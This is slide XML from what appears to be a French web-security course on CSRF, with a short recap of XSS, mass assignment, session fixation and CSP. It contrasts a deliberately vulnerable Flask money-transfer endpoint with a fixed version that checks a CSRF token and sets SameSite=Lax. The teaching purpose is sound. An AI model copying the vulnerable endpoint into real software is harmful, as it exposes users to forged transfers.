        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>loggée</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8167420" y="1325880"/>
            <a:ext cx="1267358" cy="397764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58860" y="1508760"/>
            <a:ext cx="1084478" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Site hostile</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8258860" y="2011680"/>
            <a:ext cx="1084478" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;form POST&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9796881" y="1325880"/>
            <a:ext cx="1267358" cy="3977640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EFF6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888321" y="1508760"/>
            <a:ext cx="1084478" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie part</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9888321" y="2011680"/>
            <a:ext cx="1084478" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>le serveur croit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide1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5</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CSRF</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199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30352"/>
            <a:ext cx="10058400" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ANNEXE · CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="749808"/>
            <a:ext cx="10058400" cy="329184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le cookie dit qui. Le token dit : CE formulaire.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1115568"/>
            <a:ext cx="10058400" cy="1325880"/>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115568"/>
            <a:ext cx="64008" cy="1325880"/>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07008" y="1188720"/>
            <a:ext cx="9784080" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="DC2626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnérable  ·  le cookie suffit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="1426464"/>
            <a:ext cx="9729216" cy="941832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>@app.post("/transfer")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def transfer():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    move_money(g.user["id"], request.form["to"], request.form["amount"])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2532888"/>
            <a:ext cx="10058400" cy="2542032"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3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2532888"/>
            <a:ext cx="64008" cy="2542032"/>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207008" y="2606040"/>
            <a:ext cx="9784080" cy="219456"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1000" b="1">
                <a:solidFill>
                  <a:srgbClr val="16A34A"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Correctif  ·  SameSite=Lax + token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207008" y="2843784"/>
            <a:ext cx="9729216" cy="2157984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t># Set-Cookie : SameSite=Lax   (jour 1, lab s4)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>@app.post("/transfer")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>def transfer():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    if request.form.get("csrf") != session["csrf"]:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>        abort(403)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>    move_money(g.user["id"], request.form["to"], request.form["amount"])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="E2E8F0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="5138928"/>
            <a:ext cx="10058400" cy="566928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Express : même if, req.body.csrf === req.session.csrf. Un autre site n’a pas le token : il n’a pas lu votre HTML.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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5</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CSRF</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200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expliquer CSRF en une phrase</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 SameSite=Lax coupe — et ce qu’il laisse</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exiger un token sur un changement d’état</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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5</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427939" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CSRF</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201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Checkpoint</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Vous savez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expliquer CSRF en une phrase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="2066543"/>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Un autre site poste. Votre cookie part tout seul. Le serveur croit que c’est vous.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="247802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97280" y="258775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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="260604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ce que SameSite=Lax coupe — et ce qu’il laisse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="293522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POST cross-site : non. GET de navigation : oui. D’où le token.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="3346704"/>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97280" y="345643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6" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="347472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exiger un token sur un changement d’état</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1920240" y="3803904"/>
            <a:ext cx="8778240" cy="384048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="64748B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le cookie authentifie. Le token autorise CETTE action, maintenant.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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6</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680313" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Déjà vu</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202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512064"/>
            <a:ext cx="10058400" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ANNEXE · déjà vu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="713232"/>
            <a:ext cx="10058400" cy="310896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Des noms, pour ce que vous avez déjà cassé.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rounded Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1060704"/>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05840" y="1060704"/>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25880" y="1097280"/>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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="1316736"/>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innerHTML exécute. textContent affiche. Jour 1, et le extra s5_recap (8012 / 8014).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1847088"/>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5840" y="1847088"/>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325880" y="1883664"/>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Mass assignment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2103120"/>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…request.body, role: admin. Jour 2, s3_02. Un schéma. Pas le modèle de table.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rounded Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="2633472"/>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05840" y="2633472"/>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325880" y="2670048"/>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Hijacking / fixation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="2889504"/>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On rejoue une session ouverte. Ou on vous impose l’id avant le login. Cookie HttpOnly, nouvel id au login.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rounded Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="3419856"/>
            <a:ext cx="10058400" cy="713232"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8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 y="3419856"/>
            <a:ext cx="64008" cy="713232"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4E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325880" y="3456432"/>
            <a:ext cx="9601200" cy="201168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>CSP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325880" y="3675887"/>
            <a:ext cx="9601200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="0">
                <a:solidFill>
                  <a:srgbClr val="1E293B"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>script-src ’self’ plus UNE origine. Cet après-midi, s3_04. Pas ’unsafe-inline’.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="4224527"/>
            <a:ext cx="10058400" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1300" b="1">
                <a:solidFill>
                  <a:srgbClr val="0B1220"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Le cours les a faits. L’annexe ne les rejoue pas. Vous avez les noms.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide2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7</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512063" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr sz="1100" b="0">
                <a:solidFill>
                  <a:srgbClr val="1D4ED8"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bilan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203 / 204</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280160" y="1417320"/>
            <a:ext cx="9601200" cy="3931920"/>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737360" y="1737360"/>
            <a:ext cx="8686800" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
